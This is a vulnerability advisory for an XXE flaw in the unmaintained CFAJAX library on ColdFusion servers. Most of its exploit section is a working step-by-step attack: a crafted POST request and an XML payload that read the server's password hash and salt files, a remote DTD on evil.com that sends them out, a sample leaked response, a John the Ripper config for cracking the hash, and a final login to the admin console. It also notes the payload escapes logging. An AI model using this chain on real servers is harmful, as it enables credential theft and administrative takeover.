Vulnerability Description
A vulnerability in the way CFAJAX handles incoming requests allows attackers to cause the program to execute arbitrary code. The vulnerability is present in a few packages that CFAJAX provides, below is an example of exploitation of this vulnerability in Yahoo RSS Reader. The vulnerability is not limited to this software, but to any software that uses CFAJAX.
Unfortunately CFAJAX is no longer maintained (last version came out on Nov 21st 2005), emails sent to the author go unanswered, but it is still found in several web sites we found on the Internet.
Technical Details
The vulnerability is exploited by supplying an XML file to the CFAJAX written program which is vulnerable to an XXE. The XXE vulnerability allows us to read locally stored files, in our example neo-security.xml and password.properties, which we can then crack (through bruteforce) to gain the administrative panel of Coldfusion.
Exploit
1. Send one HTTP POST request to a vulnerable server. Exploit data will not be logged (by default POST request’s payloads don’t get logged), only the URL being accessed.
POST /ajax/app/yahoo/functions.cfm?null.yahooGroupRssFeedReader HTTP/1.1 User-Agent: Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17 Host: localhost Content-Length: 213 Content-Type: application/x-www-form-urlencoded ajax=true&clientAuthenticationKey=&callCount=1&c0-scriptName=null&c0-methodName=yahooGroupRssFeedReader&c0-id=8176_1433507473868&c0-param0=string:http://evil.com/cf-92655311.xml&c0-param1=number:10&xml=true&
2. Content of cf-92655311.xml listed below:
<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE rss [ <!ENTITY % xxe-hash SYSTEM "file:///ColdFusion11/cfusion/lib/neo-security.xml"> <!ENTITY % xxe-salt SYSTEM "file:///ColdFusion11/cfusion/lib/password.properties"> <!ENTITY % end "]]>" > <!ENTITY % start "<![CDATA[" > <!ENTITY % dtd SYSTEM "http://evil.com/cdata-xxe.dtd"> %dtd; ]> <rss version="2.0"> <channel> <title>T</title> <link>L</link> <description>D</description> <item> <title>TT</title> <link>LL</link> <description>&all;</description> </item> </channel> </rss>
3. Content of cdata-xxe.dtd listed below:
<!ENTITY all "%start;%xxe-hash;%xxe-salt;%end;">
4. You should receive a response like this:
HTTP/1.1 200 OK Date: Fri, 18 Sep 2015 16:05:02 GMT Server: nginx Content-Type: text/html;charset=UTF-8 Content-Length: 1767 Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Sat, 01 Jan 2005 05:00:00 GMT X-Powered-By: ASP.NET Set-Cookie: CFID=201800; Expires=Sun, 10-Sep-2045 16:05:02 GMT; Path=/; HttpOnly Set-Cookie: CFTOKEN=; Expires=Sun, 10-Sep-2045 16:05:02 GMT; Path=/; HttpOnly Vary: Accept-Encoding ****/ var _8176_123123123 = null; _8176_123123123213 = [ { AUTHOR:' ',DESCRIPTION:' <wddxPacket version=\'1.0\'><header/><data><struct type=\'coldfusion.server.ConfigMap\'><var name=\'admin.userid.root\'><string>admin</string></var><var name=\'rds.security.enabled\'><string>true</string></var><var name=\'rds.security.usesinglerdspassword\'><boolean value=\'true\'/></var><var name=\'allowconcurrentadminlogin\'><boolean value=\'true\'/></var><var name=\'admin.userid.required\'><boolean value=\'false\'/></var><var name=\'allowedAdminIPList\'><string></string></var><var name=\'secureprofile.enabled\'><boolean value=\'false\'/></var><var name=\'CrossSiteScriptPatterns\'><struct type=\'coldfusion.server.ConfigMap\'><var name=\'<\\s*(object|embed|script|applet|meta)\'><string><InvalidTag</string></var></struct></var><var name=\'contexts\'><struct type=\'coldfusion.server.ConfigMap\'><var name=\'/\'><struct type=\'coldfusion.server.ConfigMap\'></struct></var></struct></var><var name=\'rds.enabled\'><string>false</string></var><var name=\'sbs.security.enabled\'><boolean value=\'false\'/></var><var name=\'admin.userid.root.salt\'><string>PASSWORDSALTHERE</string></var><var name=\'admin.security.enabled\'><boolean value=\'true\'/></var><var name=\'AuthorizedUsers\'><struct type=\'coldfusion.util.FastHashtable\'></struct></var></struct></data></wddxPacket>\n#Tue Sep 30 05:34:21 PDT 2014\nrdspassword=\npassword=PASSWORDHASHHERE\nencrypted=true\n ',LINK:' --3-- ',PUBDATE:' ',PUBTIME:' ',TITLE:' --2-- ' } ] DWREngine._handleResponse('8176_12312312323', _8176_123123123123, true, true, true); /* EOF CFAJAX */
4. Extract salt and password values:
admin.userid.root.salt\'><string>... and \npassword=...
5. Now that you have the salt and password. You can crack the password by following these instructions:
Hash is password variable from ./lib/password.properties.
Salt is admin.userid.root.salt variable from ./lib/neo-security.xml
Configuration file for John the Ripper:
[List.Generic:dynamic_1588] Expression=sha256($salt.sha1($pass)) (ColdFusion 11) Flag=MGF_INPUT_32_BYTE Flag=MGF_SALTED Flag=MGF_FLAT_BUFFERS Flag=MGF_BASE_16_OUTPUT_UPCASE Func=DynamicFunc__clean_input_kwik Func=DynamicFunc__clean_input2_kwik Func=DynamicFunc__append_salt Func=DynamicFunc__append_keys2 Func=DynamicFunc__SHA1_crypt_input2_append_input1 Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL Test=$dynamic_1503$37F816D599BFD69C5A0D750198AB6E46E26CEB120C9AF3B1E5306515058CBAE8$D7B6D57262290BC0A634D2D1A0DFE59F1FBE47885DBC9BB1CEBA8EA9D09D9839:test1234
6. Recover password and go to admin console (/CFIDE URL)